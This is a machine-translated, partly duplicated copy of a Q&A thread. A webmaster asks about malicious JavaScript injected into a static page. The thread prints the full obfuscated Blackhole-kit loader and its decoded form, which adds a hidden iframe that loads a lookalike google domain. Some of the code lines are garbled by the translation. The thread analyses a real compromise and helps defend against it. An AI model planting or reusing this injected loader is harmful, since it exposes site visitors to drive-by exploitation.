静态html网页上出现奇怪的Javascript
我的网站有一个静态html网页,最近无法在我的Windows XP机器上加载我的网站。Norton Antivirus阻止了该网站,称其为“网络攻击:黑洞工具包网站7”。我下载了我的index.htm页面,并在正文中找到了与同一页面的本地副本相比不是我创建的代码:静态html网页上出现奇怪的Javascript,javascript,html,Javascript,Html,我的网站有一个静态html网页,最近无法在我的Windows XP机器上加载我的网站。Norton Antivirus阻止了该网站,称其为“网络攻击:黑洞工具包网站7”。我下载了我的index.htm页面,并在正文中找到了与同一页面的本地副本相比不是我创建的代码: <script> el = document.createElement("div"); el.appendChild(document.createTextNode("ReferenceErr")); el.append
<script>
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
try {
try {
throw 1
} catch (a) {
b[2] = 21
};
} catch (a) {
k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
ar = "\"aTBtc0.gyA:/[hi],b> vCldmwf)s{up1oE'=<r(n;N}ez";
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
e = Function("ret" + pau)();
ar2 = ar2.split("c");
ar2[0] = "80";
s = "";
for (i = 0; i != ar2.length; i++) {
e('po'.concat('s=par', 'seInt(k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
e('s+=ar.substr(pos,1)');
}
e(s);
</script>
el=document.createElement(“div”);
el.appendChild(document.createTextNode(“ReferenceErr”);
el.appendChild(document.createTextNode(“q”));
el.insertBefore(document.createTextNode(“l”),el.childNodes[1]);
试一试{
试一试{
掷1
}第(一)项{
b[2]=21
};
}第(一)项{
k=el.firstChild.nodeValue+a.toString().substr(0,0);
};
ar=“\”aTBtc0.gyA:/[hi],b>vCldmwf)s{up1oE'=有人入侵了你的网站-有很多方法可以做到这一点,还有很多安全方面的改进有人入侵了你的网站-有很多方法可以做到这一点,还有很多安全方面的改进下面是脚本的最终结果。在虚拟机上运行它来测试它,通过googl得到一个恶意网站警告e也是。所有这些都是为了写这个
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
下面是该脚本的最终结果。在虚拟机上运行该脚本进行测试,并通过谷歌获得恶意网站警告。所有这些都是为了编写此脚本
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
您正在使用什么web服务器?其他详细信息也会有所帮助:操作系统、脚本环境、web应用程序平台等。有人试图利用缓冲区溢出进行攻击……您应该将其删除,并修复您的web服务器安全性。您正在使用什么web服务器?其他详细信息也会有所帮助:操作系统、脚本环境、web应用程序平台等正在尝试利用缓冲区溢出进行攻击…您应该删除它,并修复您的Web服务器安全。谢谢大家。我使用的是共享托管服务器(据我所知,Zeus是平台)。已更改我的FTP密码并将对此进行监控-他们还在我的Wordpress wp-config.php页面中添加了相同的代码。以前从未遇到过类似的情况。如果可能的话,请使用安全FTP,因为FTP发送的密码是未加密的!谢谢大家。我使用的是共享托管服务器(据我所知,Zeus是平台)。已经更改了我的FTP密码并将对此进行监控-他们还在我的Wordpress wp-config.php页面中添加了相同的代码。以前从未遇到过类似的情况。如果可能的话,请使用安全FTP,因为FTP发送的密码是未加密的!你比我强。要强调的是:toolbarquerys
dotgoogle.com
是合法网站,虽然这个脚本从toolbarquerys
hyphengoogle.com
@bemace加载了一个隐藏的iframe是的,一旦它到达那里,它看起来像是从几个不同的站点提取数据,这就是我收到谷歌警告的时候。相当棘手的是,它们使URL看起来非常有说服力。另外,如果有人想写Igor并询问如何操作莫斯科每年的这个时候,这个网站似乎都是合法的,你打败了我。要强调的是:toolbarqueries
dotgoogle.com
是合法的网站,而这个脚本从toolbarqueries
hyphengoogle.com
@bemace是的,一旦到了那里,看起来就有一个隐藏的iframe当我收到谷歌的警告时,它从不同的网站上获取数据。相当棘手的是,它们让URL看起来非常有说服力。此外,如果有人想写Igor并询问每年这个时候莫斯科的情况如何,该网站似乎拥有合法的权限